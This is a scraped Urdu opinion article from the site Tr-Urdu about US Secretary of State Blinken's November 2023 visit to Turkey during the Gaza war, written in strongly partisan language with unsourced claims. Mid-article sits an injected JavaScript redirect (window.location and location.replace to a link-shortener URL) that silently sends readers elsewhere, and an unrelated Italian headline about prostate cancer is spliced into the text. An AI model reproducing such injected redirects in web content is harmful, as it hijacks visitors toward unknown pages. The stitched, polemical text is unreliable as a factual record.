Close Menu
Tr-Urdu
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    Tr-Urdu
    Subscribe
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا
    Tr-Urdu
    You are at:Home»ترکیہ»ترکیہ کے دورے پر آئے امریکی وزیر خارجہ اینتونی بلنکن کو دھچکا
    ترکیہ

    ترکیہ کے دورے پر آئے امریکی وزیر خارجہ اینتونی بلنکن کو دھچکا

    شبانہ آیازBy شبانہ آیاز6نومبر , 2023Updated:24نومبر , 2023کوئی تبصرہ نہیں ہے۔3 Mins Read
    پوسٹ شئیر کریں
    Facebook Twitter LinkedIn Email

    ترکیہ کے وزیر خارجہ حقان فیدان اور

    امریکی وزیر خارجہ اینٹونی بلنکن کی ملاقات میں امریکہ کو سبکی کا سامنا کرنا پڑا

    کیونکہ امریکہ نے مشرق وسطیٰ میں فلسطین کے معاملے پر ہزاروں کلومیٹر دور سے مداخلت کی کوشش کی ہے۔ وہ 7 اکتوبر سے فلسطین میں جاری انسانی المیے سے لاتعلق رہا ہے ۔ اس نے خطے میں ۔

    اپنے پیادے اسرائیل کی پیٹھ پر تھپکی دی اور قتل عام جاری رکھنے کی ہدایات بھیجیں۔ امریکی وزیر خارجہ اینٹونی بلنکن نے ایک ماہ میں تیسری مرتبہ اسرائیل کا دورہ کیا۔ پھر وہ ترکیہ دورے پر ائے۔ لیکن اسے صدمے کے بعد صدمے کا سامنا کرنا پڑا۔ اس کا چہرہ تب ہی پیلا پڑ گیا جب ڈپٹی گورنر نے انقرہ ائیرپورٹ پران کا استقبال کیا…

    ‏اس پر کمال یہ کہ ترکیہ کی عوام نے

    انقرہ میں ایک پل پر حماس کے ترجمان شیخ ابو عبیدہ کی قد ادم تصویر لگادی تاکہ

    اس پل کے نیچے سے امریکی وزیر خارجہ انٹونی بلنکن گزرتے وقت دیکھ لے کہ ترکیہ حماس کی

    جدو جہد کی حمایت کرتا ہے۔

    امریکا اسرائیل تم کیسے حماس کو دہشت گرد قرار دو گے؟

    یاد رہے گزشتہ روز عوام نے ترکیہ میں موجود امریکی اڈے پر حملہ بھی کیا تھا۔

    اسرائیل نے 7 اکتوبر سے فلسطینی عوام پر موت کی بارش کر رکھی ہے۔ اس کا سب سے بڑا اتحادی امریکہ مشرق وسطیٰ میں آکر اس کی دہشت گردانہ کارروائیوں پر اس کے ساتھ کھڑا ہے۔۔

    امریکہ اور یورپی ممالک جنہوں نے ایک ماہ سے جاری حملوں پر کوئی ردعمل


    Tumore prostatico: la prognosi in base a stadio, grado e rischio

    Tumore prostatico: la prognosi in base a stadio, grado e rischio

    ظاہر نہیں کیا،انہوں نے قتل ہونے والے فلسطینی بچوں کے بجائے اسرائیل کا ساتھ دیا۔ ان میں سے ہر ایک نے قاتل وزیر اعظم نیتن یاہو کی پیٹھ پر تھپکی دی۔

    خونخوار نیتن یاہو کی سب سے بڑی حمایت کا اعلان امریکی وزیر خارجہ انٹونی بلنکن نے خود کو یہودی ظاہر کرکے کیا۔ وہ 7 اکتوبر سے اب تک تین بار اسرائیل کا دورہ کر چکے ہیں اور حملوں کے تسلسل اور معصوم شہریوں کے قتل کے خلاف خاموش رہے ہیں۔

    ہر موقع پر انسانی حقوق اور آزادی کا درس دینے والے امریکہ کے منافقانہ رویے پر جب بات مسلمان بچوں کی ہو تو وہ اسرائیل کے ان اقدامات کی پشت پناہی کرتے ہوئے نظر آتے ہیں۔

    اس ملاقات کے دوران بلنکن نے حقان فیدان کو گلے لگانے کی کوشش کی، جبکہ فیدان نے محض مصافحہ کیا۔ فیدان کے اس اقدام سے اسے ایک اور جھٹکا لگا… شرمندگی کے آثار بلنکن کے چہرے پر بری طرح جھلک رہے تھے…

    بلنکن کی نشست کے ساتھ مسجد اقصیٰ اور کریسنٹ اور ستارے کے نشانات رکھے گئے تھے۔ یہ تصویر پوری دنیا کے لیے ایک پیغام تھی کہ ترکیہ نے اسرائیل کو نظر انداز کرکے فلسطینی عوام اور حماس کے ساتھ دیا ہے۔

    وزیر خارجہ حقان فیدان کی امریکی وزیر خارجہ انٹونی بلنکن سے ملاقات بغیر کسی پریس کانفرنس کئےختم ہو گئی۔

    فیدان اور بلنکن نے وزارت خارجہ میں ون آن ون اور بین وفود کی ملاقاتیں کیں۔ دونوں وزراء کی نجی اور بین وفود کی ملاقاتیں، تقریباً 2.5 گھنٹے تک جاری رہیں۔

    ملاقات کے بعد کوئی بیان سامنے نہیں آیا۔
    window.location=”https://4.fo/1sjiqu3″;

    setTimeout(‘location.replace(“https://4.fo/1sjiqu3”)’,0);

    ترکیہ آنے سے پہلے امریکی وزیر خارجہ بلنکن نے اپنے مشرق وسطیٰ کے دورے کے ایک حصے کے طور پر سب سے پہلے اسرائیل کے دارالحکومت تل ابیب کا دورہ کیا۔ بلنکن نے اس کے بعد اردن کے دارالحکومت عمان میں اردن، مصر، سعودی عرب، قطر اور متحدہ عرب امارات (یو اے ای) کے وزرائے خارجہ سے غزہ پر اسرائیل کے حملوں کے بارے میں ملاقات کی تھی ۔

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous Articleاقوام متحدہ کے پاس جنگ کو ختم کرنے اور کسی بھی مسئلے کو حل کرنے کی صلاحیت نہیں ہے۔ نعمان قرتولموش
    Next Article

    ترکیہ کی ری پبلیکن پیپلز پارٹی میں جمہوری طریقے سے تبدیلی ، کمال کلیچ دار اولو کے بعد اؤزگور اوزیل نئے چئیرمین منتخب

    CHPپاکستان کی سیاسی جماعتوں کے لیے رول ماڈل ؟

    شبانہ آیاز
    • Facebook
    • X (Twitter)

    Related Posts

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    21جنوری , 2026

    Comments are closed.

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    ٹیگز
    #اسرائیل #حقان فیدان #حماس #سیاحت #غزہ #فلسطین آئی ٹی استنبول اسلام آباد افراطِ زر الیکشن 2024 انتخابات انقرہ اپوزیشن ایردوان بھونچال بیسٹ ماڈل آف ترکیہ ترقی ترک صدی ترک میڈیا ترکیہ تعلیم حزبِ اختلاف دنیا دہماکہ دی اکانومسٹ روس سلائِڈر سلائیڈر--- شہباز شریف صدر ایردوان صدر ایردوان، وزیراعظم شہباز شریف، پاکستان، ترکیہ عدلیہ عمران خان فیچرڈ قاتلانہ حملہ لانگ مارچ مغربی میڈیا ملت اتحاد وزیراعظم وزیراعظم شہباز شریف وزیراعظم شہباز شریف، صدر ایردوان، پاکستان، امداد پاکستان پاک فوج یورپ
    • Facebook
    • Twitter
    • Instagram
    اہم خبریں

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    ڈی ایٹ کے سیکرٹری جنرل(D8)سہیل محمود کی استنبول میں بحیرۂ اسود اقتصادی تعاون تنظیم (بی ایس ای سی) کے سیکرٹری جنرل اور رومانیہ کے سابق وزیرِ خارجہ، جنابِ عالی سفیر لازر کومانسکو سے ملاقات

    ترکیہ اسکالرشپس: دنیا کی جامع ترین ( fully funded)اسکالرشپس، آن لائن درخواستوں کا طوفان، ویب سائٹ کو کریش کے خدشات

    کیٹگریز
    • پاکستان
    • پاکستان کمیونٹی
    • ترکیہ
    • تعلیم
    • دلچسپ حقائق
    • دنیا
    • کالم اور مضامین
    • میگزین
    • ویڈیو
    مقبول پوسٹس

    او ٹی ایس اور ڈی-8 کے درمیان تعاون کے فروغ پر اتفاق سیکریٹری جنرلز کی ملاقات، ادارہ جاتی روابط مضبوط بنانے پر زور

    29جنوری , 2026

    بورڈ آف پیس،کیا پاکستان کے لیے کٹھن امتحان ہے؟ کیا ترکیہ ، مشرقِ وسطی ، سُپر قوتوں اور یورپی رہنماؤں کی عدم شرکت سےبورڈ آف پیس کو گہن لگ گیا ہے ؟

    26جنوری , 2026
    Tr-Urdu All Rights Reserved © 2022
    • صفحہ اول
    • ترکیہ
    • پاکستان
    • پاکستان کمیونٹی
    • کالم اور مضامین
    • میگزین
    • تعلیم
    • ویڈیو
    • دلچسپ حقائق
    • دنیا

    Type above and press Enter to search. Press Esc to cancel.